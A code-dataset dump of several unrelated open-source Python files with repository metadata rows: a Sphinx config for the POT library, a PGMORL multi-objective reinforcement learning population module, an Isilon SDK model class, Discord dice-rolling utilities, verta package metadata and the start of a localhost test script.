#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'POTdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'POT.tex', u'POT Python Optimal Transport library',
u'Rémi Flamary, Nicolas Courty', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pot', u'POT Python Optimal Transport library Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'POT', u'POT Python Optimal Transport library Documentation',
author, 'POT', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| 32.009404 | 80 | 0.714719 |
274f10bd35f5d5dae96909eac46439516aa3fa21 | 15,358 | py | Python | morl/population_3d.py | yunshengtian/PGMORL | 71fd9ac1128ca129de4a7c8725d5f650e329379f | [
"MIT"
] | 47 | 2020-07-11T02:00:02.000Z | 2022-03-28T09:55:08.000Z | morl/population_3d.py | yunshengtian/PGMORL | 71fd9ac1128ca129de4a7c8725d5f650e329379f | [
"MIT"
] | 2 | 2021-09-01T15:45:21.000Z | 2021-10-13T09:20:07.000Z | morl/population_3d.py | mit-gfx/PGMORL | 71fd9ac1128ca129de4a7c8725d5f650e329379f | [
"MIT"
] | 13 | 2020-07-15T02:10:42.000Z | 2022-03-09T10:18:23.000Z | import numpy as np
import torch
import torch.optim as optim
from copy import deepcopy
from sample import Sample
from utils import get_ep_indices, generate_weights_batch_dfs, update_ep, compute_hypervolume, compute_sparsity, update_ep_and_compute_hypervolume_sparsity
from scipy.optimize import least_squares
import torch.multiprocessing
torch.multiprocessing.set_sharing_strategy('file_system')
from torch.multiprocessing import Process, Queue, Event
from hypervolume import InnerHyperVolume
def collect_nearest_data(opt_graph, index, threshold = 0.1):
    """Gather training triples from the optimization graph near node `index`.

    A node qualifies when every component of its objective vector is within a
    relative `threshold` of node `index`'s objectives. For each successor edge
    of a qualifying node we record (node objectives, L1-normalized successor
    weight, successor delta-objectives).

    Returns three parallel lists: objs_data, weights_data, delta_objs_data.
    """
    objs_data = []
    weights_data = []
    delta_objs_data = []
    anchor = opt_graph.objs[index]
    tolerance = np.abs(anchor) * threshold
    for node, node_objs in enumerate(opt_graph.objs):
        # Relative closeness test, component-wise against the anchor node.
        if not np.all(np.abs(anchor - node_objs) < tolerance):
            continue
        for succ_index in opt_graph.succ[node]:
            succ_weight = opt_graph.weights[succ_index]
            objs_data.append(node_objs)
            weights_data.append(succ_weight / np.sum(succ_weight))
            delta_objs_data.append(opt_graph.delta_objs[succ_index])
    return objs_data, weights_data, delta_objs_data
def predict_hyperbolic(args, opt_graph, index, test_weights):
    """Predict the objective vectors reachable from graph node `index`.

    For each objective dimension, fits a 4-parameter scaled/shifted sigmoid
    f(x) = A*(exp(a(x-b))-1)/(exp(a(x-b))+1) + c mapping weight component ->
    objective change, using historical (weight, delta-objective) pairs from
    nodes near `index`. The fitted models are then evaluated at each weight
    in `test_weights`.

    Returns a dict {'sample_index': index, 'predictions': list of predicted
    objective vectors, one per test weight}.
    """
    test_weights = np.array(test_weights)
    # Normalize every candidate weight in place so components sum to 1.
    for test_weight in test_weights:
        test_weight /= np.sum(test_weight)
    threshold = 0.1
    sigma = 0.03
    # gradually enlarging the searching range so that get enough data point to fit the model
    while True:
        objs_data, weights_data, delta_objs_data = collect_nearest_data(opt_graph, index, threshold)
        # Count distinct weight vectors (within 1e-5); need > 3 to fit 4 params.
        cnt_data = 0
        for i in range(len(weights_data)):
            flag = True
            for j in range(i):
                if np.linalg.norm(weights_data[i] - weights_data[j]) < 1e-5:
                    flag = False
                    break
            if flag:
                cnt_data += 1
            if cnt_data > 3:
                break
        if cnt_data > 3 or threshold >= 1.0:
            break
        else:
            # Not enough distinct data: widen the neighborhood and the RBF width.
            threshold *= 2.0
            sigma *= 2.0
    # Model evaluated after fitting. A, a, b, c are the fitted parameters.
    def f(x, A, a, b, c):
        return A * (np.exp(a * (x - b)) - 1) / (np.exp(a * (x - b)) + 1) + c
    # Residuals for least_squares; closes over the per-dimension sample
    # weights `w` assigned inside the loop below.
    def fun(params, x, y):
        # f = A * (exp(a(x - b)) - 1) / (exp(a(x - b)) + 1) + c
        return (params[0] * (np.exp(params[1] * (x - params[2])) - 1.) / (np.exp(params[1] * (x - params[2])) + 1) + params[3] - y) * w
    # Analytic Jacobian of the weighted residuals (same closure over `w`).
    def jac(params, x, y):
        A, a, b, c = params[0], params[1], params[2], params[3]
        J = np.zeros([len(params), len(x)])
        # df_dA = (exp(a(x - b)) - 1) / (exp(a(x - b)) + 1)
        J[0] = ((np.exp(a * (x - b)) - 1) / (np.exp(a * (x - b)) + 1)) * w
        # df_da = A(x - b)(2exp(a(x-b)))/(exp(a(x-b)) + 1)^2
        J[1] = (A * (x - b) * (2. * np.exp(a * (x - b))) / ((np.exp(a * (x - b)) + 1) ** 2)) * w
        # df_db = A(-a)(2exp(a(x-b)))/(exp(a(x-b)) + 1)^2
        J[2] = (A * (-a) * (2. * np.exp(a * (x - b))) / ((np.exp(a * (x - b)) + 1) ** 2)) * w
        # df_dc = 1
        J[3] = w
        return np.transpose(J)
    M = args.obj_num
    delta_predictions = []
    # Fit one independent 1-D model per objective dimension.
    for dim in range(M):
        train_x = []
        train_y = []
        w = []
        for i in range(len(objs_data)):
            train_x.append(weights_data[i][dim])
            train_y.append(delta_objs_data[i][dim])
            # Gaussian weight: samples whose objectives are closer (relative
            # distance) to node `index` influence the fit more.
            diff = np.abs(objs_data[i] - opt_graph.objs[index])
            dist = np.linalg.norm(diff / np.abs(opt_graph.objs[index]))
            coef = np.exp(-((dist / sigma) ** 2) / 2.0)
            w.append(coef)
        train_x = np.array(train_x)
        train_y = np.array(train_y)
        w = np.array(w)
        # Cap the amplitude A by the observed response range, clipped to [1, 500].
        A_upperbound = np.clip(np.max(train_y) - np.min(train_y), 1.0, 500.0)
        params0 = np.ones(4)
        f_scale = 20.
        # Robust (soft-L1) bounded fit of (A, a, b, c).
        res_robust = least_squares(fun, params0, loss='soft_l1', f_scale = f_scale, args = (train_x, train_y), jac = jac, bounds = ([0, 0.1, -5., -500.], [A_upperbound, 20., 5., 500.]))
        delta_predictions.append(f(test_weights.T[dim], *res_robust.x))
    predictions = []
    # Transpose so delta_predictions[i] is the full delta vector for weight i.
    delta_predictions = np.transpose(np.array(delta_predictions))
    original_objs = opt_graph.objs[index]
    for i in range(len(test_weights)):
        predictions.append(original_objs + delta_predictions[i])
    results = {'sample_index': index, 'predictions': predictions}
    return results
class Population:
    """Performance-buffer-based population for multi-objective policy search.

    Samples are bucketed into angular "performance buffers" (unit direction
    vectors spanning the objective space); each buffer keeps at most
    `pbuffer_size` samples ordered by distance from the reference point.
    """

    def __init__(self, args):
        # args: expected to carry pbuffer_size, pbuffer_num, obj_num (and,
        # for the selection methods, num_tasks / num_processes / sparsity /
        # delta_weight / num_weight_candidates / min_weight / max_weight).
        self.sample_batch = [] # all samples in population
        self.pbuffer_size = args.pbuffer_size
        self.obj_num = args.obj_num
        self.z_min = np.zeros(args.obj_num) # left-lower reference point
        self.pbuffer_vec = []
        # Evenly-spaced weight vectors become buffer direction vectors.
        generate_weights_batch_dfs(0, args.obj_num, 0.0, 1.0, 1.0 / (args.pbuffer_num - 1), [], self.pbuffer_vec)
        # Normalize each direction to unit length.
        for i in range(len(self.pbuffer_vec)):
            self.pbuffer_vec[i] = self.pbuffer_vec[i] / np.linalg.norm(self.pbuffer_vec[i])
        self.pbuffer_num = len(self.pbuffer_vec)
        self.pbuffers = [[] for _ in range(self.pbuffer_num)] # store the sample indices in each pbuffer
        self.pbuffer_dist = [[] for _ in range(self.pbuffer_num)] # store the sample distance in each pbuffer

    def find_buffer_id(self, f):
        """Return the index of the buffer direction with the largest dot
        product against objective offset `f` (i.e. the closest in angle)."""
        max_dot, buffer_id = -np.inf, -1
        for i in range(self.pbuffer_num):
            dot = np.dot(self.pbuffer_vec[i], f)
            if dot > max_dot:
                max_dot, buffer_id = dot, i
        return buffer_id

    def insert_pbuffer(self, index, objs, enforce):
        """Try to insert sample `index` with objectives `objs` into its buffer.

        Buffers are kept sorted by descending distance from `z_min`. With
        `enforce=True` the sample is always inserted (buffer may grow past
        `pbuffer_size`); with `enforce=False` the buffer is trimmed back to
        `pbuffer_size`, or the sample is appended only if the buffer has room.
        Returns True iff the sample ended up in the buffer.
        """
        f = objs - self.z_min
        # Reject samples at/behind the reference point in any objective.
        if np.min(f) < 1e-7:
            return False
        dist = np.linalg.norm(f)
        buffer_id = self.find_buffer_id(f)
        inserted = False
        if enforce:
            for i in range(len(self.pbuffers[buffer_id])):
                if self.pbuffer_dist[buffer_id][i] < dist:
                    self.pbuffers[buffer_id].insert(i, index)
                    self.pbuffer_dist[buffer_id].insert(i, dist)
                    inserted = True
                    break
            if not inserted:
                self.pbuffers[buffer_id].append(index)
                self.pbuffer_dist[buffer_id].append(dist)
                inserted = True
        else:
            for i in range(len(self.pbuffers[buffer_id])):
                if self.pbuffer_dist[buffer_id][i] < dist:
                    self.pbuffers[buffer_id].insert(i, index)
                    self.pbuffer_dist[buffer_id].insert(i, dist)
                    inserted = True
                    break
            if inserted and len(self.pbuffers[buffer_id]) > self.pbuffer_size:
                # Trim the overflow (farthest-last ordering keeps the best).
                self.pbuffers[buffer_id] = self.pbuffers[buffer_id][:self.pbuffer_size]
                self.pbuffer_dist[buffer_id] = self.pbuffer_dist[buffer_id][:self.pbuffer_size]
            elif (not inserted) and len(self.pbuffers[buffer_id]) < self.pbuffer_size:
                self.pbuffers[buffer_id].append(index)
                self.pbuffer_dist[buffer_id].append(dist)
                inserted = True
        return inserted

    def update(self, sample_batch):
        """Rebuild the population from the union of current samples and the
        new offspring, re-filtering everything through the performance
        buffers."""
        ### population = Union(population, offspring) ###
        all_sample_batch = self.sample_batch + sample_batch
        self.sample_batch = []
        self.pbuffers = [[] for _ in range(self.pbuffer_num)]
        self.pbuffer_dist = [[] for _ in range(self.pbuffer_num)]
        ### select population by performance buffer ###
        for i, sample in enumerate(all_sample_batch):
            self.insert_pbuffer(i, sample.objs, False)
        for pbuffer in self.pbuffers:
            for index in pbuffer:
                self.sample_batch.append(all_sample_batch[index])

    def evaluate_hv(self, candidates, mask, virtual_ep_objs_batch):
        """For each unmasked candidate, hypervolume of the virtual Pareto
        front extended by that candidate's predicted objectives."""
        hv = [0.0 for _ in range(len(candidates))]
        for i in range(len(candidates)):
            if mask[i]:
                new_ep_objs_batch = update_ep(virtual_ep_objs_batch, candidates[i]['prediction'])
                hv[i] = compute_hypervolume(new_ep_objs_batch)
        return hv

    def evaluate_sparsity(self, candidates, mask, virtual_ep_objs_batch):
        """Same as evaluate_hv but computes the sparsity metric instead."""
        sparsity = [0.0 for _ in range(len(candidates))]
        for i in range(len(candidates)):
            if mask[i]:
                new_ep_objs_batch = update_ep(virtual_ep_objs_batch, candidates[i]['prediction'])
                sparsity[i] = compute_sparsity(new_ep_objs_batch)
        return sparsity

    def evaluate_hypervolume_sparsity(self, candidates, mask, virtual_ep_objs_batch):
        """Sequential combined version of evaluate_hv + evaluate_sparsity."""
        hv = [0.0 for _ in range(len(candidates))]
        sparsity = [0.0 for _ in range(len(candidates))]
        for i in range(len(candidates)):
            if mask[i]:
                new_ep_objs_batch = update_ep(virtual_ep_objs_batch, candidates[i]['prediction'])
                hv[i] = compute_hypervolume(new_ep_objs_batch)
                sparsity[i] = compute_sparsity(new_ep_objs_batch)
        return hv, sparsity

    def evaluate_hypervolume_sparsity_parallel(self, args, candidates, mask, virtual_ep_objs_batch):
        """Multiprocess version: one worker process per unmasked candidate,
        batched so at most args.num_tasks * args.num_processes run at once.
        Results come back through a Queue tagged with the candidate index."""
        hv = [0.0 for _ in range(len(candidates))]
        sparsity = [0.0 for _ in range(len(candidates))]
        processes = []
        max_process_num = args.num_tasks * args.num_processes
        queue = Queue()
        for i in range(len(candidates)):
            if mask[i]:
                p = Process(target=update_ep_and_compute_hypervolume_sparsity, args=(i, virtual_ep_objs_batch, candidates[i]['prediction'], queue))
                p.start()
                processes.append(p)
                if len(processes) >= max_process_num:
                    # Drain one result per launched process before launching more.
                    for _ in processes:
                        task_id, hv_res, sparsity_res = queue.get()
                        hv[task_id] = hv_res
                        sparsity[task_id] = sparsity_res
                    processes = []
        # Drain results of the final partial batch.
        for _ in processes:
            task_id, hv_res, sparsity_res = queue.get()
            hv[task_id] = hv_res
            sparsity[task_id] = sparsity_res
        return hv, sparsity

    def prediction_guided_selection(self, args, iteration, ep, opt_graph, scalarization_template):
        """Select (sample, weight) training tasks by predicted improvement.

        Phase 1 (prediction): for every sample, propose up to
        `num_weight_candidates` weight directions near its last direction and
        predict the resulting objectives via predict_hyperbolic.
        Phase 2 (optimization): greedily pick N candidates maximizing
        predicted hypervolume minus alpha * sparsity against a virtual
        Pareto front that is updated after each pick.
        Returns (elite_batch, scalarization_batch, predicted_offspring_objs).
        """
        N = args.num_tasks # number of (sample, weight) to be selected
        num_weights = args.num_weight_candidates # for each sample, we have num_weights optimization directions to be candidates, they distribute evenly around the last weight direction
        ### Prediction ###
        candidates = [] # list of candidate, each candidate is a (sample, weight) pair associated with their predicted future point
        for sample in self.sample_batch:
            # get weights evenly distributed around the last weight direction and only discard the weight in the left bottom region
            weight_center = opt_graph.weights[sample.optgraph_id]
            weight_center = weight_center / np.sum(weight_center)
            weight_candidates = []
            generate_weights_batch_dfs(0, args.obj_num, 0.0, 1.0, args.delta_weight / 2.0, [], weight_candidates)
            test_weights = []
            # add weight center
            duplicated = False
            for succ in opt_graph.succ[sample.optgraph_id]:
                w = deepcopy(opt_graph.weights[succ])
                w = w / np.sum(w)
                if np.linalg.norm(w - weight_center) < 1e-3:
                    duplicated = True
                    break
            if not duplicated:
                test_weights.append(weight_center)
            # randomly add other weights
            weight_indices = np.array([i for i in range(len(weight_candidates))])
            np.random.shuffle(weight_indices)
            for i in range(len(weight_indices)):
                if len(test_weights) >= num_weights: # if enough weights have been selected, then stop
                    break
                weight = weight_candidates[weight_indices[i]]
                if np.linalg.norm(weight - weight_center) < 1e-3:
                    continue
                # Angle between candidate weight and the sample's last direction.
                angle = np.arccos(np.clip(np.dot(weight_center, weight) / np.linalg.norm(weight_center) / np.linalg.norm(weight), -1.0, 1.0))
                if angle < np.pi / 4.0: # check if weight is close to the previous weight
                    duplicated = False
                    for succ in opt_graph.succ[sample.optgraph_id]:
                        w = deepcopy(opt_graph.weights[succ])
                        w = w / np.sum(w)
                        if np.linalg.norm(w - weight) < 1e-3:
                            duplicated = True
                            break
                    if not duplicated:
                        test_weights.append(weight)
            if len(test_weights) > 0:
                results = predict_hyperbolic(args, opt_graph, sample.optgraph_id, test_weights)
                for i in range(len(test_weights)):
                    candidates.append({'sample': sample, 'weight': test_weights[i], \
                        'prediction': results['predictions'][i]})
        ### Optimization ###
        # initialize virtual ep as current ep
        virtual_ep_objs_batch = []
        for i in range(len(ep.sample_batch)):
            virtual_ep_objs_batch.append(deepcopy(ep.sample_batch[i].objs))
        mask = np.ones(len(candidates), dtype = bool)
        predicted_offspring_objs = []
        elite_batch, scalarization_batch = [], []
        # greedy algorithm for knapsack problem
        alpha = args.sparsity
        for _ in range(N):
            hv, sparsity = self.evaluate_hypervolume_sparsity_parallel(args, candidates, mask, virtual_ep_objs_batch)
            # select the one with max dhv - alpha * dsparsity
            max_metrics, best_id = -np.inf, -1
            for i in range(len(candidates)):
                if mask[i]:
                    if hv[i] - alpha * sparsity[i] > max_metrics:
                        max_metrics, best_id = hv[i] - alpha * sparsity[i], i
            if best_id == -1:
                print('Too few candidates')
                break
            elite_batch.append(candidates[best_id]['sample'])
            scalarization = deepcopy(scalarization_template)
            scalarization.update_weights(candidates[best_id]['weight'] / np.sum(candidates[best_id]['weight']))
            scalarization_batch.append(scalarization)
            # Remove the picked candidate from further consideration.
            mask[best_id] = False
            # update virtual_ep_objs_batch
            predicted_new_objs = [deepcopy(candidates[best_id]['prediction'])]
            virtual_ep_objs_batch = update_ep(virtual_ep_objs_batch, predicted_new_objs[0])
            predicted_offspring_objs.extend(predicted_new_objs)
        return elite_batch, scalarization_batch, predicted_offspring_objs

    def random_selection(self, args, scalarization_template):
        """Baseline: pick args.num_tasks samples uniformly at random, each
        paired with a random normalized weight vector."""
        elite_batch, scalarization_batch = [], []
        for _ in range(args.num_tasks):
            elite_idx = np.random.choice(len(self.sample_batch))
            elite_batch.append(self.sample_batch[elite_idx])
            weights = np.random.uniform(args.min_weight, args.max_weight, args.obj_num)
            weights = weights / np.sum(weights)
            scalarization = deepcopy(scalarization_template)
            scalarization.update_weights(weights)
            scalarization_batch.append(scalarization)
        return elite_batch, scalarization_batch
| 44.387283 | 185 | 0.586209 |
22f49225ecb30a1ee88e7af914869cba037b34fd | 3,327 | py | Python | isi_sdk_8_2_1/isi_sdk_8_2_1/models/hdfs_fsimage_job_settings.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_8_2_1/isi_sdk_8_2_1/models/hdfs_fsimage_job_settings.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_8_2_1/isi_sdk_8_2_1/models/hdfs_fsimage_job_settings.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 8
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_8_2_1.models.hdfs_fsimage_job_settings_settings import HdfsFsimageJobSettingsSettings # noqa: F401,E501
class HdfsFsimageJobSettings(object):
    """Swagger model for the HDFS FSImage job settings.

    NOTE: originally produced by the swagger code generator; the generated
    public interface (swagger_types, attribute_map, accessors, to_dict/to_str,
    equality) is preserved exactly.
    """

    # attribute name -> declared swagger type
    swagger_types = {
        'settings': 'HdfsFsimageJobSettingsSettings'
    }

    # attribute name -> JSON key on the wire
    attribute_map = {
        'settings': 'settings'
    }

    def __init__(self, settings=None):  # noqa: E501
        """HdfsFsimageJobSettings - a model defined in Swagger.

        :param settings: optional settings for the HDFS FSImage job
        """
        self._settings = None
        self.discriminator = None
        if settings is not None:
            self.settings = settings

    @property
    def settings(self):
        """Settings for the HDFS FSImage job.  # noqa: E501

        :return: The settings of this HdfsFsimageJobSettings.  # noqa: E501
        :rtype: HdfsFsimageJobSettingsSettings
        """
        return self._settings

    @settings.setter
    def settings(self, settings):
        """Set the settings for the HDFS FSImage job.  # noqa: E501

        :param settings: The settings of this HdfsFsimageJobSettings.  # noqa: E501
        :type: HdfsFsimageJobSettingsSettings
        """
        self._settings = settings

    def to_dict(self):
        """Return the model properties as a dict (one level of conversion)."""
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                # Convert model elements; leave plain values as-is.
                result[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    key: val.to_dict() if hasattr(val, "to_dict") else val
                    for key, val in value.items()
                }
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Return the string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """True iff `other` is the same model type with equal attributes."""
        if not isinstance(other, HdfsFsimageJobSettings):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self == other
8f1252d09b124a2b04c2846293668f786a2f805b | 5,736 | py | Python | cogs/dice/dice_utils.py | VegaSera/SWNDiscordBot2 | cb73b9d51591b6af9f2a1a603ea0dd8a7161020c | [
"MIT"
] | 2 | 2020-09-08T18:08:55.000Z | 2021-06-22T17:13:32.000Z | cogs/dice/dice_utils.py | VegaSera/SWNDiscordBot2 | cb73b9d51591b6af9f2a1a603ea0dd8a7161020c | [
"MIT"
] | null | null | null | cogs/dice/dice_utils.py | VegaSera/SWNDiscordBot2 | cb73b9d51591b6af9f2a1a603ea0dd8a7161020c | [
"MIT"
] | 1 | 2020-06-30T19:12:27.000Z | 2020-06-30T19:12:27.000Z | from cogs.utils.ToolUtils import diceroller
import re
def keep_dice(die, side, keep):
    """Roll `die` dice with `side` sides (XdYkZ) and keep the `keep` highest.

    Returns (total, entries): the sum of the kept rolls, and a list holding
    the kept rolls as ints followed by the dropped rolls rendered as
    markdown strikethrough strings (``~~n~~``).
    """
    total, rolls = diceroller(die, side, verbose=True)
    if keep >= die:
        # Keeping every die: nothing needs to be crossed out.
        return total, rolls
    if keep <= 0:
        # Everything dropped: zero total, every roll struck through.
        return 0, ["~~" + str(roll) + "~~" for roll in rolls]
    # Keep the `keep` largest rolls; strike through whatever remains.
    remaining = rolls
    kept = []
    for _ in range(int(keep)):
        best = max(remaining)
        kept.append(best)
        remaining.remove(best)
    kept_total = sum(kept)
    kept.extend("~~" + str(roll) + "~~" for roll in remaining)
    return kept_total, kept
def drop_dice(die, side, drop):
    """Roll `die` dice with `side` sides (XdYdZ) and drop the `drop` lowest.

    Returns (total, entries): the sum of the kept rolls, and a list holding
    the kept rolls as ints followed by the dropped rolls rendered as
    markdown strikethrough strings (``~~n~~``).
    """
    total, rolls = diceroller(die, side, verbose=True)
    if drop >= die:
        # Dropping everything: zero total, all rolls struck through.
        return 0, ["~~" + str(roll) + "~~" for roll in rolls]
    if drop <= 0:
        # Nothing dropped.
        return total, rolls
    # Keep the (die - drop) largest rolls; strike through the rest.
    remaining = rolls
    kept = []
    for _ in range(int(die) - int(drop)):
        best = max(remaining)
        kept.append(best)
        remaining.remove(best)
    kept_total = sum(kept)
    kept.extend("~~" + str(roll) + "~~" for roll in remaining)
    return kept_total, kept
def is_sensible_roll(dice):
    """Validate a regex-matched dice group for sane sizes.

    `dice` is a regex match tuple whose element 1 is the dice count and
    element 2 is the side count (both strings). Returns (ok, error_message);
    error_message is the empty string when the roll is acceptable.
    """
    count, sides = int(dice[1]), int(dice[2])
    if count > 100:
        return False, "Attempted to roll more than 100 dice in a single group."
    if sides > 50000:
        return False, "Attempted to roll a dice with more than 50000 sides."
    return True, ""
def parse_dice_string(dicestring, verbose=False):
    """Parse a dice expression (e.g. "2d6+1d20k1-3") and compute the total.

    Recognizes four term kinds via regex: keep dice (XdYkZ), drop dice
    (XdYdZ), simple dice (XdY), and flat modifiers (+N/-N). Each term is
    rolled/evaluated, appended to a human-readable result string (with
    per-roll detail when `verbose`), and its signed total accumulated.
    Returns (grand_total, formatted_string); on an oversized roll returns
    (0, error_message) immediately.
    """
    results = []
    return_string = ''
    simple_dice = re.findall('(\A|[+-])(\d+)d(\d+)(?=[+-]|\Z|\s|\n)', dicestring)
    keepdice = re.findall('(\A|[+-])(\d+)d(\d+)k(\d+)(?=[+-]|\Z|\s|\n)', dicestring)
    dropdice = re.findall('(\A|[+-])(\d+)d(\d+)d(\d+)(?=[+-]|\Z|\s|\n)', dicestring)
    modifier = re.findall('([+-])(\d+)(?=[^d0-9]|[+-]|\s|\Z)', dicestring)
    #Keep Dice
    #Structure of the keep dice - [Sign/Start Of String][Number of Dice][Number of Sides][Number to Keep]
    #Checking for sensibility
    for i in keepdice:
        if not is_sensible_roll(i)[0]:
            return 0, is_sensible_roll(i)[1]
        print(i)  # NOTE(review): leftover debug print — consider removing
        # If the dice are sensible
        total, kept_list = keep_dice(int(i[1]), int(i[2]), int(i[3]))
        # Render the individual rolls as "[a, b, ~~c~~]" for verbose output.
        verbose_string = '['
        for x in kept_list:
            verbose_string += (str(x) + ", ")
        verbose_string = verbose_string[:-2]
        verbose_string += ']'
        lst = list(i)
        # A term at the start of the string has no sign: treat as '+'.
        if i[0] not in ['-', '+']:
            lst[0] = '+'
        else:
            lst[0] = i[0]
        string = (" " + lst[0] + " " + i[1] + 'd' + i[2] + 'k' + i[3] + '(**' + str(total) + '**)')
        if verbose:
            string += str(verbose_string)
        return_string += string
        # Accumulate the signed term value.
        if i[0] == '-':
            results.append(total*-1)
        else:
            results.append(total)
    # Drop dice: same flow as keep dice but using drop_dice.
    for i in dropdice:
        if not is_sensible_roll(i)[0]:
            return 0, is_sensible_roll(i)[1]
        total, keptlist = drop_dice(int(i[1]), int(i[2]), int(i[3]))
        verbosestring = '['
        for x in keptlist:
            verbosestring += (str(x) + ', ')
        verbosestring = verbosestring[:-2]
        verbosestring += ']'
        if i[0] not in ['-', '+']:
            lst = list(i)
            lst[0] = '+'
        else:
            lst = list(i)
            lst[0] = i[0]
        string = (" " + lst[0] + " " + i[1] + 'd' + i[2] + 'd' + i[3] + '(**' + str(total) + '**)')
        if verbose:
            string += str(verbosestring)
        return_string += string
        if i[0] == '-':
            results.append(total * -1)
        else:
            results.append(total)
    # Plain XdY groups.
    for i in simple_dice:
        if not is_sensible_roll(i)[0]:
            return 0, is_sensible_roll(i)[1]
        total, split = diceroller(int(i[1]), int(i[2]), verbose=True)
        verbosestring = '['
        for x in split:
            verbosestring += (str(x) + ', ')
        verbosestring = verbosestring[:-2]
        verbosestring += ']'
        string = (" " + i[0] + " " + i[1] + 'd' + i[2] + '(**' + str(total) + '**)')
        if verbose:
            string += str(verbosestring)
        return_string += string
        if i[0] == '-':
            results.append(total * -1)
        else:
            results.append(total)
    # Flat +N / -N modifiers.
    for i in modifier:
        string = " " + str(i[0]) + " **" + str(i[1] + "**")
        return_string += string
        if i[0] == '-':
            results.append(int(i[1]) * -1)
        elif i[0] == '+':
            results.append(int(i[1]))
    # Drop the leading " +"/" -" separator before the first term.
    return_string = return_string[2:]
    return sum(results), return_string
3d127f5da5b9a29f694f1906ec08096626029d9e | 289 | py | Python | client/verta/verta/__about__.py | Vafilor/modeldb | 57e617fa64368e7c5c8ae186955e3e28b39fd5a9 | [
"Apache-2.0"
] | null | null | null | client/verta/verta/__about__.py | Vafilor/modeldb | 57e617fa64368e7c5c8ae186955e3e28b39fd5a9 | [
"Apache-2.0"
] | null | null | null | client/verta/verta/__about__.py | Vafilor/modeldb | 57e617fa64368e7c5c8ae186955e3e28b39fd5a9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Package metadata constants for the `verta` client library; exposed as
# module-level dunder attributes (description, license, maintainer, title,
# homepage URL, and version).
__description__ = "Python client for interfacing with ModelDB and the Verta platform"
__license__ = "Apache 2.0"
__maintainer__ = "Michael Liu"
__maintainer_email__ = "miliu@verta.ai"
__title__ = "verta"
__url__ = "https://www.verta.ai/"
__version__ = "0.14.12a0"
| 28.9 | 85 | 0.726644 |
538ffe401c49c0d05a43261202eb3c320605d747 | 827 | py | Python | test.py | danx0r/djangle | 3b87a68ad423d87a40764ec50851592121b6b911 | [
"BSD-3-Clause"
] | null | null | null | test.py | danx0r/djangle | 3b87a68ad423d87a40764ec50851592121b6b911 | [
"BSD-3-Clause"
] | 4 | 2019-11-22T19:15:19.000Z | 2021-06-10T20:49:43.000Z | test.py | danx0r/djangle | 3b87a68ad423d87a40764ec50851592121b6b911 | [
"BSD-3-Clause"
] | null | null | null | import os,sys
# Smoke-test the example endpoints on localhost:8000: echo each curl
